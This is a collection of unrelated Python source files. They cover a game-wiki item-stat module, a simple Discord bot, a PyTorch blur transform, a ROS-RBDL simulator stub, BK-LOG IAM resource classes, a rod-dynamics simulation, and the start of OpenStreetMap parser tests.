    'bp location': (lambda s, pt: "Location of the station where you can hack or dock to get this blueprint"),
    'charge delay': (lambda s, pt: "How long it takes a ship to start recharging its shields"),
    'charge rate': (lambda s, pt: "How fast a ship can recharge its shields"),
    'cost': (lambda s, pt: "The item cost when purchasing from the store"),
    'damage': (lambda s, pt: "Base damage per projectile hit"),
    'destination': (lambda s, pt: "The system/location where a Micro Gate will take you"),
    'dmg': (lambda s, pt: "Base damage per projectile hit"),
    'dmg type': (lambda s, pt: "Type of direct damage done by the item"),
    'dpe': (lambda s, pt: "Damage per energy spent, including effect damage"),
    'dph': (lambda s, pt: "Base damage per projectile hit"),
    'dps': (lambda s, pt: "Damage per second, including effect damage"),
    'effect': (lambda s, pt: "Status effect applied"),
    # 'effect icons': (lambda s, pt: ""),
    'effects': (lambda s, pt: "Status effect applied"),
    'energy': (lambda s, pt: "Energy used per shot"),
    'energy usage': (lambda s, pt: "Energy used per shot"),
    # 'engine name': (lambda s, pt: ""),
    'et': (lambda s, pt: "Effect Time"),
    'eu': (lambda s, pt: "Energy used per shot"),
    'fire rate': (lambda s, pt: "Rate of fire"),
    # 'image': (lambda s, pt: ""),
    'img': (lambda s, pt: "Item image"),
    'init spd': (lambda s, pt: "Projectile initial speed measured in su/s"),
    'init speed': (lambda s, pt: "Projectile initial speed measured in su/s"),
    'is': (lambda s, pt: "Projectile initial speed measured in su/s"),
    # 'item': (lambda s, pt: ""),
    'is passive': (lambda s, pt: "Whether or not this augmentation is passive"),
    'lifetime': (lambda s, pt: "Lifetime measured in seconds"),
    'lifetime (s)': (lambda s, pt: "Lifetime measured in seconds"),
    'lrng': (lambda s, pt: "Locking range"),
    'lt': (lambda s, pt: "Lifetime measured in seconds"),
    'max spd': (lambda s, pt: "Projectile max speed measured in su/s"),
    'max speed': (lambda s, pt: "Projectile max speed measured in su/s"),
    'maximum charge multiplier': (lambda s, pt: "The multiplier for a ship's maximum shielding"),
    'maximum charge mult': (lambda s, pt: "The multiplier for a ship's maximum shielding"),
    'min rng': (lambda s, pt: "Minimum range measured in su. Before this range is reached the projectile is not yet active and will bounce off targets"),
    'mrng': (lambda s, pt: "Minimum range measured in su. Before this range is reached the projectile is not yet active and will bounce off targets"),
    'ms': (lambda s, pt: "Projectile max speed measured in su/s"),
    # 'name': (lambda s, pt: ""),
    # 'notes': (lambda s, pt: ""),
    'obtained': (lambda s, pt: "How you can obtain the item"),
    'obtaining': (lambda s, pt: "How you can obtain the item"),
    'obtain': (lambda s, pt: "How you can obtain the item"),
    'pd': (lambda s, pt: "The time in seconds the engine will continue to boost. While the boost is active the ship cannot decelerate"),
    'price unmodified': (lambda s, pt: "Raw price of the item, without being adjusted for buying or selling"),
    'prop': (lambda s, pt: "Engine propulsion speed modifier. Applied to the max speed, this is how fast your ship will go when boosting"),
    'prop time': (lambda s, pt: "The time in seconds the engine will continue to boost. While the boost is active the ship cannot decelerate"),
    'propulsion': (lambda s, pt: "Engine propulsion speed modifier. Applied to the max speed, this is how fast your ship will go when boosting"),
    # 'purchase cost': (lambda s, pt: ""),
    'race': (lambda s, pt: "The race which owns the item. In the case of NPR races this will be who you need to farm for the drop"),
    'range': (lambda s, pt: "Range of the weapon measured in su"),
    'rebuy cost': (lambda s, pt: "Ammo cost (each)"),
    'required_skill': (lambda s, pt: "The required skill to purchase or craft the item"),
    'reverse': (lambda s, pt: "The max speed the ship can reach while reversing, as a percentage of the max speed"),
    'rng': (lambda s, pt: "Range of the weapon measured in su"),
    # 'rate of fire': (lambda s, pt: ""),
    'rof': (lambda s, pt: "Rate of fire"),
    # 'secondary effects': (lambda s, pt: ""),
    'sk': (lambda s, pt: "The required skill to purchase or craft the item"),
    'skill': (lambda s, pt: "The required skill to purchase or craft the item"),
    'spd': (lambda s, pt: "Projectile speed measured in su/s. May include initial speed"),
    'speed': (lambda s, pt: "Engine max speed multiplier"),
    'td': (lambda s, pt: "Total damage per volley, including effect damage"),
    'tdpe': (lambda s, pt: "Total damage per energy spent, including effect damage"),
    'tdpv': (lambda s, pt: "Total damage per volley, including effect damage"),
    'tdps': (lambda s, pt: "Total damage per second, including effect damage"),
    'total dmg': (lambda s, pt: "Total damage per volley, including effect damage"),
    'total ammo': (lambda s, pt: "Ammo per clip (Reserve ammo)"),
    'trn': (lambda s, pt: "Turning rate - rate at which the projectile rotates measured in degrees per second"),
    'turning': (lambda s, pt: "Turn rate modifier - the higher a ship's turn rate the more agile it is"),
    'turn': (lambda s, pt: "Turning rate - rate at which the projectile rotates measured in degrees per second"),
    'type': (lambda s, pt: "The type of item this is (Mineral, Primary Weapon, Collectible, etc)"),
    'velocity': (lambda s, pt: "Projectile speed measured in su/s. May include initial speed"),
    'volley': (lambda s, pt: "Number of projectiles fired per volley"),
    'weapon_type': (lambda s, pt: "The type of weapon this is (primary, utility, large, etc)"),
}
def GetDescriptionForItemStatName(statName, pageType):
    """Tooltip text for a stat column; "" when none is defined.

    On crafting pages the "purchase or craft" wording is narrowed to
    crafting only.
    """
    try:
        func = itemStatDescriptionSwitcher.get(statName.lower(), (lambda s, pt: ""))
        rtnVal = func(statName, pageType)
    except Exception:
        # Was a bare except; e.g. a non-string statName renders as blank.
        return ""
    if rtnVal and pageType == 'crafting':
        rtnVal = rtnVal.replace('to purchase or craft the item', 'to craft the item')
    return rtnVal
# Begin Sorting Functions
def SortByNameAndRangeId(item):
    """Sort key: base item name, then the numeric level index when present."""
    nameInfo = SplitNameIntoBaseNameAndItemLevel(item['name'])
    baseName = nameInfo['fullNameMinusLevel']
    if nameInfo['levelIdx'] is None:
        return baseName
    return "{}-{}".format(baseName, nameInfo['levelIdx'])
def GetItemSortFunc(sortBy="Default"):
    """Return a sort-key function for item lists.

    Supported values (case-insensitive): "name", "race", "skilllevel".
    Anything else - including a non-string sortBy - falls back to the
    default name-and-level ordering.

    (Previously sortBy.lower() was recomputed per comparison branch under a
    bare except; the lowering now happens once and only its AttributeError
    is handled.)
    """
    try:
        key = sortBy.lower()
    except AttributeError:
        # Non-string sortBy (e.g. None): use the default ordering.
        return SortByNameAndRangeId
    if key == "name":
        return lambda v: v['name'].lower()
    if key == "race":
        return lambda v: "{:03d}-{}".format(v['race'], v['name'].lower())
    if key == 'skilllevel':
        return lambda v: "{:03d}-{}-{}".format(GetItemSkillLevel(v), GetItemSkillName(v), v['name'].lower())
    return SortByNameAndRangeId
# Begin Data Initialization Functions
def PrepareItemDataPrimaryList():
    """Merge the public and private item feeds into itemDataDict/itemData.

    Public data wins on id collisions; every item's base name (level suffix
    stripped) is also recorded in itemBaseNameList.
    """
    global itemDataDict, itemData, itemBaseNameList
    itemDataDict = {}

    def registerBaseName(itemName):
        # Track each distinct base name, lower-cased with underscores as spaces.
        nameParts = SplitNameIntoBaseNameAndItemLevel(itemName)
        baseName = nameParts['fullNameMinusLevel'].lower().replace('_', ' ')
        if baseName not in itemBaseNameList:
            itemBaseNameList.append(baseName)

    # itemDataPublic is updated quite regularly, at least as often as the game
    # is patched. It is incomplete however: no NPR items, and no equivalent of
    # the range and crafting data.
    for item in itemDataPublic:
        item['__dataSource'] = 'public'
        itemDataDict[item['id']] = item
        registerBaseName(item['name'])
    # itemDataPrivate is updated often, often when the game is patched.
    for item in itemDataPrivate.values():
        if item['id'] in itemDataDict:
            continue
        item['__dataSource'] = 'private'
        # Fix for a bug. This should only be needed short term until the data
        # is updated next.
        if item['name'] == 'Devimon Fire Blast' and item['race'] == 8:
            item['__bugfixActive'] = True
            item['race'] = 25
        itemDataDict[item['id']] = item
        registerBaseName(item['name'])
    # Generate the item data list from the data dictionary.
    itemData = list(itemDataDict.values())
def Initialize():
    """Load all item data and build the id lists used elsewhere in the module."""
    global itemIdListToSkip, beamWeaponOverrideIdList, rarePlayerRaceDropIdList
    LoadItemInformation()
    PrepareItemDataPrimaryList()
    beamWeaponOverrideIdList = [ GetItemByName(n)['id'] for n in beamWeaponOverrideList ]
    rarePlayerRaceDropIdList = [ GetItemByName(n)['id'] for n in rarePlayerRaceDropList ]
    for item in itemData:
        # Skip items with no blueprint location or in equip category 7.
        if GetItemBPLocation(item) == 'N/A':
            itemIdListToSkip.append(item['id'])
        elif 'equipCategory' in item and item['equipCategory'] == 7:
            itemIdListToSkip.append(item['id'])
        else:
            # Explicitly blacklisted names are skipped as well.
            for skipItem in itemsToSkip:
                if item['name'].lower() == skipItem.lower():
                    itemIdListToSkip.append(item['id'])
def LoadItemInformation():
    """Fetch all raw item datasets into the module-level caches; always returns True."""
    global itemDataPrivate, itemDataPublic, itemRangeData, itemVariantData, itemCraftableData
    # Item data provided publicly on the Starfighter: Infinity website.
    itemDataPublic = DataLoader.LoadItemDataFromPublicStarfighterWebsite()
    # Item data provided by Ben Olding.
    itemDataPrivate = DataLoader.LoadWeaponDataFromBenOldingWebsite()
    itemRangeData = DataLoader.LoadWeaponRangesDataFromBenOldingWebsite()
    itemVariantData = DataLoader.LoadWeaponVariantDataFromBenOldingWebsite()
    itemCraftableData = DataLoader.LoadWeaponCraftableDataFromBenOldingWebsite()
    return True
# Populate all module-level item data at import time.
Initialize()
|
# bot.py
import os
import ast
import discord
from dotenv import load_dotenv
# Pull DISCORD_TOKEN (and any other settings) from a local .env file
# into the process environment.
load_dotenv()
TOKEN = os.getenv('DISCORD_TOKEN')
# The Discord client; event handlers are registered on it below.
client = discord.Client()
@client.event
async def on_ready():
    """Announce on stdout that the bot has connected and logged in."""
    bot_name = client.user.name
    print(f'{bot_name} has connected to Discord!')
@client.event
async def on_member_join(member):
    """DM a greeting to each newly joined member."""
    await member.create_dm()
    greeting = f'Hi {member.name}, welcome to my Discord server!'
    await member.dm_channel.send(greeting)
@client.event
async def on_message(message):
    """Dispatch simple chat commands.

    Commands:
      * "hey bytie!" - greeting
      * "$$"         - LaTeX placeholder
      * "ast <code>" - reply with the parsed AST of <code>
    """
    if message.author == client.user:
        # Ignore our own messages to avoid reply loops.
        return
    incoming = message.content
    if incoming.startswith('hey bytie!'):
        response = "Yes sir!"
        await message.channel.send(response)
    if incoming.startswith("$$"):
        response = "I didn't yet implement the LaTeX rendering, sir!"
        await message.channel.send(response)
    if incoming.startswith("ast "):
        # ast.parse only parses (never executes) the input, but it raises
        # SyntaxError on malformed code - report that instead of letting the
        # event handler crash on arbitrary user input.
        try:
            tree = ast.parse(incoming[4:])
        except SyntaxError as e:
            await message.channel.send(f"SyntaxError: {e}")
            return
        result = ast.dump(tree)
        # NOTE(review): ast.dump output can exceed Discord's message length
        # limit for large inputs - consider truncating before sending.
        await message.channel.send(result)
# Start the bot; blocks until the client disconnects.
client.run(TOKEN)
|
from random import randint
import torch
from ...stability.blur import TFMSBoxBlur
class TFMSRandomBoxBlur(torch.nn.Module):
    """Applies a TFMSBoxBlur whose kernel size is drawn at random on every call.

    Each kernel side is sampled independently between the corresponding min
    and max sizes and forced to an odd value so the blur stays centred.
    """

    def __init__(self, min_kernel_size=(11, 11), max_kernel_size=(51, 51), border_type='reflect'):
        super(TFMSRandomBoxBlur, self).__init__()
        self.min_kernel_size = min_kernel_size
        self.max_kernel_size = max_kernel_size
        self.border_type = border_type

    def _random_odd_size(self, axis):
        # Sample a half-size in [min//2, max//2] and map it to an odd size.
        half = randint(self.min_kernel_size[axis] // 2, self.max_kernel_size[axis] // 2)
        return half * 2 + 1

    def forward(self, img):
        kernel_size = (self._random_odd_size(0), self._random_odd_size(1))
        return TFMSBoxBlur(kernel_size, border_type=self.border_type)(img)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""ROS-RBDL simulator
This 'simulator' is not per se a simulator, it communicates with the real robots in the real world using ROS [1], and
computes any necessary kinematic and dynamics information using the RBDL library [2].
Specifically, this 'simulator' starts the `roscore` (if not already running), then loads robot urdf models and creates
the necessary topics/services, and uses the rigid body dynamics library to compute kinematic and dynamic information
about the model.
Dependencies in PRL:
* `pyrobolearn.simulators.simulator.Simulator`
References:
[1] ROS: http://www.ros.org/
[2] RBDL: https://rbdl.bitbucket.io/
"""
# TODO
import rospy
import rbdl
from pyrobolearn.simulators.simulator import Simulator
__author__ = "Brian Delhaisse"
__copyright__ = "Copyright 2018, PyRoboLearn"
__credits__ = ["Brian Delhaisse"]
__license__ = "GNU GPLv3"
__version__ = "1.0.0"
__maintainer__ = "Brian Delhaisse"
__email__ = "briandelhaisse@gmail.com"
__status__ = "Development"
class RBDL_ROS(Simulator):
    r"""RBDL-ROS Interface.

    NOTE(review): this class is an unfinished stub - the constructor always
    raises NotImplementedError, so no instance can currently be created.

    References:
        [1] ROS: http://www.ros.org/
        [2] RBDL: https://rbdl.bitbucket.io/
        [3] RBDL in Python: https://rbdl.bitbucket.io/dd/dee/_python_example.html
    """
    def __init__(self, **kwargs):
        # Not usable yet: construction always fails after base-class init.
        super(RBDL_ROS, self).__init__(render=False)
        raise NotImplementedError
    def step(self, sleep_time=0):
        """Perform a step in the simulator, and sleep the specified amount of time.
        Args:
            sleep_time (float): amount of time to sleep after performing one step in the simulation.
        """
        # Intentionally a no-op in this stub.
        pass
    def load_urdf(self, filename, position, orientation):
        """Load a URDF model with RBDL.
        Args:
            filename: path to the URDF file.
            position: base position (currently unused - TODO confirm intended use).
            orientation: base orientation (currently unused - TODO confirm intended use).
        """
        # load the model in rbdl
        # NOTE(review): the loaded model is discarded and nothing is returned;
        # presumably it should be stored on self or returned - confirm.
        model = rbdl.loadModel(filename)
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-LOG 蓝鲸日志平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-LOG 蓝鲸日志平台 is licensed under the MIT License.
License for BK-LOG 蓝鲸日志平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
We undertake not to change the open source license (MIT license) applicable to the current version of
the project delivered to anyone in the future.
"""
import abc
from typing import List
from django.conf import settings
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_lazy as _lazy
from apps.api import TransferApi
from apps.iam.exceptions import ResourceNotExistError
from iam import Resource
class ResourceMeta(metaclass=abc.ABCMeta):
    """
    Resource definition: base class describing one IAM resource type.
    """
    # IAM system the resource type belongs to.
    system_id: str = ""
    # Resource type id and display name.
    id: str = ""
    name: str = ""
    selection_mode: str = ""
    # Fix: the default used to be "" (a str), contradicting the List
    # annotation; an empty list is the correct "no selections" default
    # (subclasses override this with their own selection list).
    related_instance_selections: List = []
    @classmethod
    def to_json(cls):
        """Serialize this resource-type declaration for IAM registration."""
        return {
            "system_id": cls.system_id,
            "id": cls.id,
            "selection_mode": cls.selection_mode,
            "related_instance_selections": cls.related_instance_selections,
        }
    @classmethod
    def create_simple_instance(cls, instance_id: str, attribute=None) -> Resource:
        """
        Create a bare resource instance.
        :param instance_id: instance ID
        :param attribute: attribute key/value pairs
        """
        attribute = attribute or {}
        if "bk_biz_id" in attribute:
            # Attach the IAM path so authorization can be scoped by business.
            attribute.update({"_bk_iam_path_": "/{},{}/".format(Business.id, attribute["bk_biz_id"])})
        return Resource(cls.system_id, cls.id, str(instance_id), attribute)
    @classmethod
    def create_instance(cls, instance_id: str, attribute=None) -> Resource:
        """
        Create a resource instance with its display name; subclasses may override.
        :param instance_id: instance ID
        :param attribute: attribute key/value pairs
        """
        return cls.create_simple_instance(instance_id, attribute)
class Business(ResourceMeta):
    """CMDB business resource type."""

    system_id = "bk_cmdb"
    id = "biz"
    name = _lazy("业务")
    selection_mode = "instance"
    related_instance_selections = [{"system_id": system_id, "id": "business"}]

    @classmethod
    def create_instance(cls, instance_id: str, attribute=None) -> Resource:
        from apps.log_search.models import ProjectInfo

        resource = cls.create_simple_instance(instance_id, attribute)
        # Prefer the project name as the display name; fall back to the raw id.
        project = ProjectInfo.objects.filter(bk_biz_id=instance_id).first()
        display_name = project.project_name if project else str(instance_id)
        resource.attribute = {"id": str(instance_id), "name": display_name}
        return resource
class Collection(ResourceMeta):
    """Log collection resource type."""

    system_id = settings.BK_IAM_SYSTEM_ID
    id = "collection"
    name = _lazy("采集项")
    selection_mode = "instance"
    related_instance_selections = [{"system_id": system_id, "id": "collection_list"}]

    @classmethod
    def create_simple_instance(cls, instance_id: str, attribute=None) -> Resource:
        from apps.log_databus.models import CollectorConfig

        resource = super().create_simple_instance(instance_id, attribute)
        if resource.attribute:
            # Caller already supplied attributes; nothing to enrich.
            return resource
        try:
            collector = CollectorConfig.objects.get(pk=instance_id)
        except CollectorConfig.DoesNotExist:
            return resource
        biz_id = collector.bk_biz_id
        resource.attribute = {
            "id": str(instance_id),
            "name": collector.collector_config_name,
            "bk_biz_id": biz_id,
            "_bk_iam_path_": "/{},{}/".format(Business.id, biz_id),
        }
        return resource
class EsSource(ResourceMeta):
    """Elasticsearch source resource type."""

    system_id = settings.BK_IAM_SYSTEM_ID
    id = "es_source"
    name = _lazy("ES源")
    selection_mode = "instance"
    related_instance_selections = [{"system_id": system_id, "id": "es_source_list"}]

    @classmethod
    def create_simple_instance(cls, instance_id: str, attribute=None) -> Resource:
        resource = super().create_simple_instance(instance_id, attribute)
        if resource.attribute:
            return resource
        try:
            clusters = TransferApi.get_cluster_info({"cluster_id": instance_id})
            if not clusters:
                return resource
            cluster_config = clusters[0]["cluster_config"]
            cluster_name = cluster_config["cluster_name"]
            biz_id = cluster_config["custom_option"].get("bk_biz_id", 0)
        except Exception:  # pylint: disable=broad-except
            # Best effort: return the bare resource when the API lookup fails.
            return resource
        resource.attribute = {
            "id": str(instance_id),
            "name": cluster_name,
            "bk_biz_id": biz_id,
            "_bk_iam_path_": "/{},{}/".format(Business.id, biz_id),
        }
        return resource
class Indices(ResourceMeta):
    """Index set resource type."""

    system_id = settings.BK_IAM_SYSTEM_ID
    id = "indices"
    name = _lazy("索引集")
    selection_mode = "instance"
    related_instance_selections = [{"system_id": system_id, "id": "indices_list"}]

    @classmethod
    def create_simple_instance(cls, instance_id: str, attribute=None) -> Resource:
        from apps.log_search.models import LogIndexSet, ProjectInfo

        resource = super().create_simple_instance(instance_id, attribute)
        if resource.attribute:
            return resource
        try:
            index_set = LogIndexSet.objects.get(pk=instance_id)
            project = ProjectInfo.objects.get(pk=index_set.project_id)
        except (LogIndexSet.DoesNotExist, ProjectInfo.DoesNotExist):
            return resource
        biz_id = project.bk_biz_id
        resource.attribute = {
            "id": str(instance_id),
            "name": index_set.index_set_name,
            "bk_biz_id": biz_id,
            "_bk_iam_path_": "/{},{}/".format(Business.id, biz_id),
        }
        return resource
class ResourceEnum:
    """
    Resource type enumeration: maps symbolic names to the resource meta classes.
    """

    BUSINESS = Business
    COLLECTION = Collection
    ES_SOURCE = EsSource
    INDICES = Indices
# Registry of every resource meta class declared on ResourceEnum, keyed by id.
_all_resources = {
    member.id: member
    for member in vars(ResourceEnum).values()
    if hasattr(member, "id")
}


def get_resource_by_id(resource_id: str) -> ResourceMeta:
    """
    Resolve a resource meta class from its resource id.
    :raises ResourceNotExistError: when no resource declares this id
    """
    resource = _all_resources.get(resource_id)
    if resource is None:
        raise ResourceNotExistError(_("资源ID不存在:{resource_id}").format(resource_id=resource_id))
    return resource
|
import numpy as np
from scipy.optimize import fsolve
from scipy.linalg import expm
import matplotlib.pyplot as plt
# Some utilities
# map a vector to a skew symmetric matrix
def skew(x):
    """Return the 3x3 skew-symmetric (hat) matrix of a 3-vector."""
    a, b, c = x[0], x[1], x[2]
    return np.array([
        [0, -c, b],
        [c, 0, -a],
        [-b, a, 0],
    ])
# map a twist to its adjoint form
def adjoint(x):
    """Return the 6x6 adjoint representation of a twist (angular part first)."""
    def hat(v):
        return np.array([[0, -v[2], v[1]], [v[2], 0, -v[0]], [-v[1], v[0], 0]])

    w_hat = hat(x[:3])
    v_hat = hat(x[3:])
    return np.block([[w_hat, np.zeros((3, 3))], [v_hat, w_hat]])
# flatten a homogeneous transformation matrix to a vector
def flatten(g):
    """Pack a 4x4 homogeneous transform into a 12-vector (rotation row-major, then translation)."""
    rotation = g[:3, :3].reshape(9)
    translation = g[:3, 3]
    return np.concatenate([rotation, translation])
# unflatten a homogeneous transformation
def unflatten(g):
    """Inverse of flatten: rebuild the 4x4 homogeneous transform from a 12-vector."""
    # np.row_stack is a deprecated alias (removed in NumPy 2.x); np.vstack is
    # the supported equivalent and produces an identical result.
    top = np.column_stack((np.reshape(g[:9], (3, 3)), g[9:]))
    return np.vstack((top, np.array([0, 0, 0, 1])))
# the matrix representation of a twist vector
def se(x):
    """Matrix (se(3)) representation of a twist vector: [[hat(w), v], [0, 0, 0, 0]]."""
    # np.row_stack is a deprecated alias (removed in NumPy 2.x); use np.vstack.
    top = np.column_stack((skew(x[:3]), x[3:]))
    return np.vstack((top, np.array([0, 0, 0, 0])))
# Initialization
def initRod(N):
    """Initialize the rod state.

    Returns (g, xi, eta): flattened poses (N, 12), strains (N, 6) and
    velocities (N, 6) for N spatial points along the rod.
    """
    L = 10e-2  # length of the rod
    # constant initial strain: quarter-circle bend, unit stretch along the axis
    xi = np.repeat(np.array([[0, np.pi / 4 / L, 0, 0, 0, 1]]), N, 0)
    eta = np.zeros((N, 6))
    g = np.zeros((N, 12))
    # explicit Euler RKMK: reconstruct the poses by integrating the strains
    ds = L / (N - 1)
    frame = np.eye(4)
    g[0, :] = flatten(frame)
    for k in range(1, N):
        frame = frame @ expm(se(ds * xi[k - 1, :]))
        g[k, :] = flatten(frame)
    return g, xi, eta
#Integration
def step(g, xi, eta):
    """Advance the rod one time step.

    Solves the tip boundary condition for the base strain xi0, then
    integrates the whole system with that value.
    """
    xi0 = fsolve(lambda base_strain: condition(g, xi, eta, base_strain), xi[0, :])
    return integrate(g, xi, eta, xi0)
def condition(g, xi, eta, xi0):
    """Residual of the free-tip boundary condition for a guessed base strain xi0."""
    _, xi_next, _ = integrate(g, xi, eta, xi0)
    # the tip must be strain-free (reference configuration: unit stretch only)
    return xi_next[-1, :] - np.array([0, 0, 0, 0, 0, 1])
def integrate(g, xi, eta, xi0):
    """One implicit-midpoint time step of the geometric rod model.

    :param g: (N, 12) flattened poses at the current time level
    :param xi: (N, 6) strain field at the current time level
    :param eta: (N, 6) velocity field at the current time level
    :param xi0: guessed strain at the base (s = 0) for the next time level
    :return: (g_next, xi_next, eta_next) state at the next time level
    """
    # initialize empty matrices for storage
    g_next = np.zeros_like(g)
    xi_next = np.zeros_like(xi)
    eta_next = np.zeros_like(eta)
    # determine number of spatial points, just believe everything is the right size
    (N, _) = xi.shape
    # set the guessed value
    xi_next[0, :] = xi0
    # material and geometric properties
    xi_ref = np.array([0, 0, 0, 0, 0, 1])  # undeformed reference: straight rod, unit stretch
    L = 10e-2
    D = 1e-2
    E = 1e6
    rho = 1e3
    ds = L / (N - 1)
    dt = 0.01
    A = np.pi / 4 * D ** 2
    I = np.pi / 64 * D ** 4
    J = 2 * I
    G = E / 3
    K = np.diag([E * I, E * I, G * J, G * A, G * A, E * A])  # stiffness matrix
    M = rho * np.diag([I, I, J, A, A, A])  # inertia matrix
    # integration over the body (don't need the initial point as the initial values are determined already)
    for i in range(N - 1):
        # averaging over steps to get half step values
        xi_half = (xi_next[i, :] + xi[i, :]) / 2
        eta_half = (eta_next[i, :] + eta[i, :]) / 2
        # implicit midpoint approximation
        xi_dot = (xi_next[i, :] - xi[i, :]) / dt
        eta_dot = (eta_next[i, :] - eta[i, :]) / dt
        # spatial derivatives
        xi_der = np.linalg.inv(K) @ (
                (M @ eta_dot) - (adjoint(eta_half).T @ M @ eta_half) + (adjoint(xi_half).T @ K @ (xi_half - xi_ref)))
        eta_der = xi_dot - (adjoint(xi_half) @ eta_half)
        # explicit Euler step
        xi_half_next = xi_half + ds * xi_der
        eta_half_next = eta_half + ds * eta_der
        # determine next step from half step value
        xi_next[i + 1, :] = 2 * xi_half_next - xi[i+1, :]
        eta_next[i + 1, :] = 2 * eta_half_next - eta[i+1, :]
    # midpoint RKMK to step the g values
    for i in range(N):
        g_next[i, :] = flatten(unflatten(g[i,:]) @ expm(se(dt * (eta_next[i,:] + eta[i,:])/2)))
    return g_next, xi_next, eta_next
# Testing functions
def plotDynamics(N, steps):
    """Animate the rod centerline (x vs z components of g) over `steps` time steps."""
    fig, ax = plt.subplots()
    g, xi, eta = initRod(N)
    ax.set_aspect('equal')
    ax.plot(g[:, 9], g[:, 11])
    plt.pause(0.01)  # make the plots show up as they're updated
    for _ in range(steps):
        g, xi, eta = step(g, xi, eta)
        ax.plot(g[:, 9], g[:, 11])
        plt.pause(0.01)  # make the plots show up as they're updated
    # keep the window open for inspection and saving
    plt.show()
def energy(xi, eta):
    """Total (kinetic + potential) energy of the rod, scaled by the spatial step.

    :param xi: (N, 6) strain field
    :param eta: (N, 6) velocity field
    :return: discrete approximation of the rod's total energy
    """
    # similar to the setup for the integrator (material constants must match)
    (N, _) = xi.shape
    xi_ref = np.array([0, 0, 0, 0, 0, 1])
    L = 10e-2
    D = 1e-2
    E = 1e6
    rho = 1e3
    ds = L / (N - 1)
    # (removed unused `dt` from the original)
    A = np.pi / 4 * D ** 2
    I = np.pi / 64 * D ** 4
    J = 2 * I
    G = E / 3
    K = np.diag([E * I, E * I, G * J, G * A, G * A, E * A])  # stiffness matrix
    M = rho * np.diag([I, I, J, A, A, A])  # inertia matrix
    H = 0  # total energy
    # integrate over the rod
    for i in range(N):
        T = eta[i, :].T @ M @ eta[i, :]  # kinetic term
        U = (xi[i, :] - xi_ref).T @ K @ (xi[i, :] - xi_ref)  # potential term
        H += 1 / 2 * (T + U)
    return ds * H  # multiply by discrete step size to scale
def plotEnergy(N, steps):
    """Plot the total energy after each time step to check conservation."""
    fig, ax = plt.subplots()
    g, xi, eta = initRod(N)
    energies = []
    for _ in range(steps):
        g, xi, eta = step(g, xi, eta)
        energies.append(energy(xi, eta))
    ax.plot(energies)
    plt.show()
# Call the script as python conservative.py
if __name__ == "__main__":
    # plotDynamics(100, 20)  # alternative demo: animate the rod shape
    plotEnergy(100,100)
import pytest
import os
import datetime
import osmdigest.detail as detail
def test_OSMElement():
    """A full attribute set parses into osm_id, keys and typed metadata."""
    el = detail.OSMElement("tag", {"id":"298884269", "lat":"54.0901746", "lon":"12.2482632", "user":"SvenHRO",
                      "uid":"46882", "visible":"true", "version":"1", "changeset":"676636",
                      "timestamp":"2008-09-21T21:37:45Z"})
    assert( el.osm_id == 298884269 )
    assert( el.name == "tag" )
    assert( el.subobjs == [] )
    assert( el.keys == {"lon", "lat"} )
    assert( el.metadata == {"user":"SvenHRO", "uid":46882, "version":1, "changeset":676636,
                           "timestamp": datetime.datetime(2008,9,21,21,37,45)} )

def test_OSMElement_user_optional():
    """Missing user/uid attributes default to "" and 0 in the metadata."""
    el = detail.OSMElement("tag", {"id":"298884269", "lat":"54.0901746", "lon":"12.2482632",
                      "visible":"true", "version":"1", "changeset":"676636",
                      "timestamp":"2008-09-21T21:37:45Z"})
    assert( el.metadata == {"user":"", "uid":0, "version":1, "changeset":676636,
                           "timestamp": datetime.datetime(2008,9,21,21,37,45)} )

def test_OSMElement_must_be_visible():
    """Elements marked visible="false" are rejected with ValueError."""
    with pytest.raises(ValueError):
        detail.OSMElement("tag", {"id":"298884269", "lat":"54.0901746", "lon":"12.2482632",
                      "visible":"false", "version":"1", "changeset":"676636",
                      "timestamp":"2008-09-21T21:37:45Z"})

def test_OSMElement_other_parse_error():
    """A non-numeric id raises ValueError."""
    with pytest.raises(ValueError):
        detail.OSMElement("tag", {"id":"2988sgjaf84269", "lat":"54.0901746", "lon":"12.2482632",
                      "visible":"false", "version":"1", "changeset":"676636",
                      "timestamp":"2008-09-21T21:37:45Z"})
def test_Node():
    """A node element exposes parsed latitude/longitude and a readable repr."""
    el = detail.Node("node", {"id":"298884269", "lat":"54.0901746", "lon":"12.2482632", "user":"SvenHRO",
                      "uid":"46882", "visible":"true", "version":"1", "changeset":"676636",
                      "timestamp":"2008-09-21T21:37:45Z"})
    assert(el.latitude == pytest.approx(54.0901746))
    assert(el.longitude == pytest.approx(12.2482632))
    assert( str(el) == "Node(298884269 @ [54.0901746,12.2482632])" )

def test_Node_must_be_correct_name():
    """Constructing a Node from a non-"node" element raises ValueError."""
    with pytest.raises(ValueError):
        detail.Node("tag", {"id":"298884269", "lat":"54.0901746", "lon":"12.2482632", "user":"SvenHRO",
                      "uid":"46882", "visible":"true", "version":"1", "changeset":"676636",
                      "timestamp":"2008-09-21T21:37:45Z"})

def test_Node_mustnt_have_extra_attributes():
    """Unknown attributes on a node element raise ValueError."""
    with pytest.raises(ValueError):
        detail.Node("tag", {"id":"298884269", "lat":"54.0901746", "lon":"12.2482632", "user":"SvenHRO",
                      "uid":"46882", "visible":"true", "version":"1", "changeset":"676636",
                      "timestamp":"2008-09-21T21:37:45Z", "extra":"dave"})
def test_Way():
    """A way element parses and starts with an empty node-ref list."""
    el = detail.Way("way", {"id":"298884269", "user":"SvenHRO",
